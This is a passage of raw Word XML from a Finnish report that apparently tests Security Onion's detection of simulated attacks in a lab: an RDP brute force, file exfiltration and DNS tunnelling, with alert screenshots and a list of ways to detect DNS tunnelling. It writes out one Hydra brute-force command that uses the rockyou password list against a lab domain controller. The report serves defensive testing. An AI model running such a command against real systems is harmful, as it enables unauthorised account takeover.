        <w:rPr/>
        <w:t xml:space="preserve">aiheuttaa hälytyksiä suorittamalla </w:t>
      </w:r>
      <w:r w:rsidR="00D75B7B">
        <w:rPr/>
        <w:t>brute</w:t>
      </w:r>
      <w:r w:rsidR="00AE696D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D75B7B">
        <w:rPr/>
        <w:t>force</w:t>
      </w:r>
      <w:r w:rsidR="00D75B7B">
        <w:rPr/>
        <w:t xml:space="preserve"> hyökkäys kohteeseen 10.</w:t>
      </w:r>
      <w:r w:rsidR="005D7292">
        <w:rPr/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D75B7B">
        <w:rPr/>
        <w:t>.0.10 (</w:t>
      </w:r>
      <w:r w:rsidR="005D7292">
        <w:rPr/>
        <w:t>DC01</w:t>
      </w:r>
      <w:r w:rsidR="00D75B7B">
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FD0B96">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE696D">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>jetaan kali-</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>ws</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t xml:space="preserve"> laitteella komento</w:t>
      </w:r>
      <w:r w:rsidR="00AE696D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>hydra</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t xml:space="preserve"> -l ./users.txt -P /</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>wordlists</w:t>
      </w:r>
      <w:r w:rsidR="008C1D3B">
        <w:rPr/>
        <w:t>/rockyou.txt rdp://10.1.0.10</w:t>
      </w:r>
      <w:r w:rsidR="00EA65D2">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE696D">
        <w:rPr/>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00A20F35">
        <w:rPr/>
        <w:t>sers.txt sisältää käyttäjätunnu</w:t>
      </w:r>
      <w:r w:rsidR="004300ED">
        <w:rPr/>
        <w:t>ksia</w:t>
      </w:r>
      <w:r w:rsidR="00A20F35">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA65D2">
        <w:rPr/>
        <w:t>WS01</w:t>
      </w:r>
      <w:r w:rsidR="00A20F35">
        <w:rPr/>
        <w:t xml:space="preserve"> laitteeseen ja rockyou.txt on </w:t>
      </w:r>
      <w:r w:rsidR="00107C12">
        <w:rPr/>
        <w:t>tiedosto,</w:t>
      </w:r>
      <w:r w:rsidR="00CF7FBE">
        <w:rPr/>
        <w:t xml:space="preserve"> joka sisältää </w:t>
      </w:r>
      <w:r w:rsidR="004300ED">
        <w:rPr/>
        <w:t xml:space="preserve">vuotaneita salasanoja. </w:t>
      </w:r>
      <w:r w:rsidR="00F4486E">
        <w:rPr/>
        <w:t xml:space="preserve">Tästä aiheutuu </w:t>
      </w:r>
      <w:r w:rsidR="0080150D">
        <w:rPr/>
        <w:t xml:space="preserve">useita hälytyksiä RDP vastauksista ulkoiseen </w:t>
      </w:r>
      <w:r w:rsidR="00EA65D2">
        <w:rPr/>
        <w:t>isäntään</w:t>
      </w:r>
      <w:r w:rsidR="0080150D">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EA65D2">
        <w:rPr/>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00A27B21">
        <w:rPr/>
        <w:t xml:space="preserve">uviossa 5 </w:t>
      </w:r>
      <w:r w:rsidR="00E561B8">
        <w:rPr/>
        <w:t xml:space="preserve">tapahtuman hälytykset Security </w:t>
      </w:r>
      <w:r w:rsidR="00E561B8">
        <w:rPr/>
        <w:t>Onionin</w:t>
      </w:r>
      <w:r w:rsidR="00E561B8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E561B8">
        <w:rPr/>
        <w:t>kibana</w:t>
      </w:r>
      <w:r w:rsidR="00EA65D2">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E561B8">
        <w:rPr/>
        <w:t>käyttöliittymässä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="69C25FF6" w:rsidRDefault="69C25FF6" w14:paraId="729EAF41" w14:textId="74AE35C6">
      <w:r w:rsidR="69C25FF6">
        <w:rPr/>
        <w:t xml:space="preserve">Tässä tilanteessa Security </w:t>
      </w:r>
      <w:r w:rsidR="69C25FF6">
        <w:rPr/>
        <w:t>Onion</w:t>
      </w:r>
      <w:r w:rsidR="69C25FF6">
        <w:rPr/>
        <w:t xml:space="preserve"> huomaa </w:t>
      </w:r>
      <w:r w:rsidR="660D5495">
        <w:rPr/>
        <w:t>internet yhteyksistä</w:t>
      </w:r>
      <w:r w:rsidR="69C25FF6">
        <w:rPr/>
        <w:t xml:space="preserve"> kirjautumisyritykset</w:t>
      </w:r>
      <w:r w:rsidR="5FC01AE0">
        <w:rPr/>
        <w:t xml:space="preserve"> ulospäin</w:t>
      </w:r>
      <w:r w:rsidR="69C25FF6">
        <w:rPr/>
        <w:t xml:space="preserve"> ja hälyttää niistä. </w:t>
      </w:r>
      <w:r w:rsidR="2993EF47">
        <w:rPr/>
        <w:t xml:space="preserve">Työkalu selaa lokidatan ja hälyttää </w:t>
      </w:r>
      <w:r w:rsidR="2993EF47">
        <w:rPr/>
        <w:t>toimminnasta</w:t>
      </w:r>
      <w:r w:rsidR="2993EF47">
        <w:rPr/>
        <w:t>, joka voi mahdollisesti viitata hyökkä</w:t>
      </w:r>
      <w:r w:rsidR="04BE0E19">
        <w:rPr/>
        <w:t xml:space="preserve">äjän toimintaan. Näin </w:t>
      </w:r>
      <w:r w:rsidR="04BE0E19">
        <w:rPr/>
        <w:t>brute-fo</w:t>
      </w:r>
      <w:r w:rsidR="7C8C2C3E">
        <w:rPr/>
        <w:t>rce</w:t>
      </w:r>
      <w:r w:rsidR="7C8C2C3E">
        <w:rPr/>
        <w:t xml:space="preserve"> hyökkäys saadaan näkyville käyttöliittymään.</w:t>
      </w:r>
      <w:r w:rsidR="04BE0E19">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E561B8" w:rsidR="00E561B8" w:rsidP="00E561B8" w:rsidRDefault="00E561B8" w14:paraId="2A7419E5" w14:textId="77777777"/>
    <w:p w:rsidR="0072376F" w:rsidP="0072376F" w:rsidRDefault="0072376F" w14:paraId="4CBC2092" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0072376F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02119B34" wp14:editId="53A2B621">
            <wp:extent cx="6120130" cy="1209040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="305677560" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus,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77560" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, Multimediaohjelmisto&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1209040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E739A0" w:rsidR="00E561B8" w:rsidP="0072376F" w:rsidRDefault="0072376F" w14:paraId="31F0544A" w14:textId="7DC1BDC7">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971522" w:id="34"/>
      <w:r w:rsidRPr="00E739A0">
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E739A0">
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E739A0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EA65D2">
        <w:t>Brute force -hyökkäykestä aiheutuneet hälytykset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00080B14" w:rsidP="0072376F" w:rsidRDefault="00080B14" w14:paraId="541098D4" w14:textId="46FBB726">
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t xml:space="preserve">Koska loki datat koskevat verkkoliikennettä, saamme ilmoitukset esimerkiksi juuri aiemmin mainitusta </w:t>
      </w:r>
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t>rdp</w:t>
      </w:r>
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t xml:space="preserve"> liikenteestä. Tämä riippuu siitä mitä protokollaa </w:t>
      </w:r>
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t>brute</w:t>
      </w:r>
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t>force</w:t>
      </w:r>
      <w:r w:rsidR="00080B14">
        <w:rPr/>
        <w:t xml:space="preserve"> hyökkäyksessä koitetaan hyödyntää</w:t>
      </w:r>
      <w:r w:rsidR="00C256D7">
        <w:rPr/>
        <w:t>, kun iskun on antanut pyöriä hetken</w:t>
      </w:r>
      <w:r w:rsidR="004021E3">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C256D7">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004021E3">
        <w:rPr/>
        <w:t xml:space="preserve">Kuviossa 6 </w:t>
      </w:r>
      <w:r w:rsidR="00B97CFC">
        <w:rPr/>
        <w:t xml:space="preserve">tarkastellaan tarkemmin </w:t>
      </w:r>
      <w:r w:rsidR="00B97CFC">
        <w:rPr/>
        <w:t>rdp</w:t>
      </w:r>
      <w:r w:rsidR="00B97CFC">
        <w:rPr/>
        <w:t xml:space="preserve"> vastausta osoitteesta 10.3.0.10 osoitteeseen 10.2.0.13.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B137F" w:rsidP="005B137F" w:rsidRDefault="006030FE" w14:paraId="6670DAAF" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="006030FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BCF0031" wp14:editId="3567D57B">
            <wp:extent cx="6120130" cy="4789170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1660957752"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57752" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, ohjelmisto&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4789170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008305D2" w:rsidR="00E561B8" w:rsidP="0049408D" w:rsidRDefault="005B137F" w14:paraId="70032AE3" w14:textId="3FBB38EB">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971523" w:id="35"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B97CFC">
        <w:t>Yksittäinen hälytys</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00FD0B96" w:rsidP="008F0EE6" w:rsidRDefault="00B97CFC" w14:paraId="611B68C3" w14:textId="4DD07205">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1857378946" w:id="1575170186"/>
      <w:r w:rsidR="00B97CFC">
        <w:rPr/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0088417E">
        <w:rPr/>
        <w:t>ovellustason protokollat: web protokollat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1575170186"/>
    </w:p>
    <w:p w:rsidR="00B51F40" w:rsidP="0088417E" w:rsidRDefault="00B97CFC" w14:paraId="3FCFAF44" w14:textId="1032702B">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0088417E">
        <w:t xml:space="preserve">imuloidaan </w:t>
      </w:r>
      <w:r w:rsidR="00107C12">
        <w:t>tapausta,</w:t>
      </w:r>
      <w:r w:rsidR="0088417E">
        <w:t xml:space="preserve"> jossa hyökkääjä </w:t>
      </w:r>
      <w:r w:rsidR="00161477">
        <w:t xml:space="preserve">yrittää piilottaa </w:t>
      </w:r>
      <w:r w:rsidR="00B51F40">
        <w:t xml:space="preserve">tiedostojen siirtämisen omalle palvelimelleen verkkoliikenteen sekaan. </w:t>
      </w:r>
      <w:r w:rsidR="00161477">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E668A8">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00B51F40">
        <w:t xml:space="preserve">jetaan </w:t>
      </w:r>
      <w:r w:rsidR="00107C12">
        <w:t>Windowsilla</w:t>
      </w:r>
      <w:r w:rsidR="00B51F40">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kuvion </w:t>
      </w:r>
      <w:r w:rsidR="00E668A8">
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="00B51F40">
        <w:t>komennot</w:t>
      </w:r>
      <w:r w:rsidR="00E668A8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B1649" w:rsidP="004B1649" w:rsidRDefault="00E93A0B" w14:paraId="4B805820" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00E93A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567F7BEC" wp14:editId="1A838454">
            <wp:extent cx="6120130" cy="1643380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212179328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93282" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1643380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0088417E" w:rsidR="00B51F40" w:rsidP="004B1649" w:rsidRDefault="004B1649" w14:paraId="7D3B527A" w14:textId="60143FBE">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971524" w:id="37"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00001148">
        <w:t>Tiedostonsiirtokomento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00E93A0B" w:rsidP="002F6D54" w:rsidRDefault="00E93A0B" w14:paraId="4D36403B" w14:textId="246DB71C">
      <w:r>
        <w:t xml:space="preserve">Tässä meidän </w:t>
      </w:r>
      <w:r w:rsidR="0012165B">
        <w:t>toimintamme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tunnistetaankin vaaralliseksi ja estetään.</w:t>
      </w:r>
      <w:r w:rsidR="00001148">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00107C12">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="00107C12">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>nionin kibana näkymään syntyy</w:t>
      </w:r>
      <w:r w:rsidR="00001148">
        <w:t xml:space="preserve"> kuvion 8 mukainen hälytys</w:t>
      </w:r>
      <w:r w:rsidR="00453F2B">
        <w:t xml:space="preserve">, joka ilmoittaa mahdollisesta haittaohjelmasta, joka on asennettu </w:t>
      </w:r>
      <w:r w:rsidR="002209AB">
        <w:t>epäaidon Opera agentin avulla.</w:t>
      </w:r>
      <w:r w:rsidR="000E5C9D">
        <w:t xml:space="preserve"> (Kuvio 8)</w:t>
      </w:r>
      <w:r w:rsidR="00001148">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B1649" w:rsidP="004B1649" w:rsidRDefault="005E6D91" w14:paraId="5B242292" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="005E6D91">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C38EAB9" wp14:editId="222B6464">
            <wp:extent cx="6120130" cy="1807845"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="67703217" name="Kuva 1" descr="Kuva, joka sisältää kohteen Multimediaohjelmisto, ohjelmisto, Grafiikkaohjelmisto,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3217" name="Kuva 1" descr="Kuva, joka sisältää kohteen Multimediaohjelmisto, ohjelmisto, Grafiikkaohjelmisto, kuvakaappaus&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1807845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E739A0" w:rsidP="002209AB" w:rsidRDefault="004B1649" w14:paraId="0A76B5BF" w14:textId="0D692D51">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971525" w:id="38"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidR="005915C2">
        <w:t xml:space="preserve"> Hälytys malwaresta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E739A0" w:rsidP="008F0EE6" w:rsidRDefault="00CB022F" w14:paraId="676D4449" w14:textId="0005A10C">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1737066921" w:id="487437903"/>
      <w:r w:rsidR="00CB022F">
        <w:rPr/>
        <w:t>DNS tunnelointi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487437903"/>
    </w:p>
    <w:p w:rsidR="00CB022F" w:rsidP="00CB022F" w:rsidRDefault="002209AB" w14:paraId="633CDC46" w14:textId="1B4140FB">
      <w:r w:rsidR="002209AB">
        <w:rPr/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D9378D">
        <w:rPr/>
        <w:t xml:space="preserve">estataan seuraavaksi </w:t>
      </w:r>
      <w:r w:rsidR="002D6159">
        <w:rPr/>
        <w:t xml:space="preserve">hälytysten </w:t>
      </w:r>
      <w:r w:rsidR="00CA76B9">
        <w:rPr/>
        <w:t>aktivointia,</w:t>
      </w:r>
      <w:r w:rsidR="002D6159">
        <w:rPr/>
        <w:t xml:space="preserve"> kun hyökkääjä käyttää </w:t>
      </w:r>
      <w:r w:rsidR="002209AB">
        <w:rPr/>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="002D6159">
        <w:rPr/>
        <w:t xml:space="preserve"> tunnelointia </w:t>
      </w:r>
      <w:r w:rsidR="001771CE">
        <w:rPr/>
        <w:t>pakettien</w:t>
      </w:r>
      <w:r w:rsidR="002D6159">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA76B9">
        <w:rPr/>
        <w:t>liikutteluun</w:t>
      </w:r>
      <w:r w:rsidR="00EA0997">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F4577E">
        <w:rPr/>
        <w:t xml:space="preserve">Naamioimalla liikenteen DNS liikenteeksi hyökkääjät voivat yrittää välttää </w:t>
      </w:r>
      <w:r w:rsidR="00580D97">
        <w:rPr/>
        <w:t>toimien huomaamista</w:t>
      </w:r>
      <w:r w:rsidR="003273BC">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="3D948B47" w14:textId="01F0E5A5">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>DNS-tunneloinnin voi havaita seuraavilla menetelmillä:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="48C8D56F" w14:textId="3D948328">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Poikkeamien tunnistus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="53ADF630" w14:textId="251ECE90">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Seurataan DNS-liikennettä ja etsitään epätavallisia asioita:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="362B8A49" w14:textId="1AA2720A">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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Kyselyjen määrä lyhyen ajan sisään.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="7D8B6035" w14:textId="2B103627">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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Suuri DNS TXT-tietueet, joka viittaa pakettien muokkaamiseen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="7CFAC7A0" w14:textId="1487E5B3">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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Kyselyt epäilyttäviin domaineihin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="7EF7CEF6" w14:textId="545FA36E">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="080BDE62" w14:textId="2084157B">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
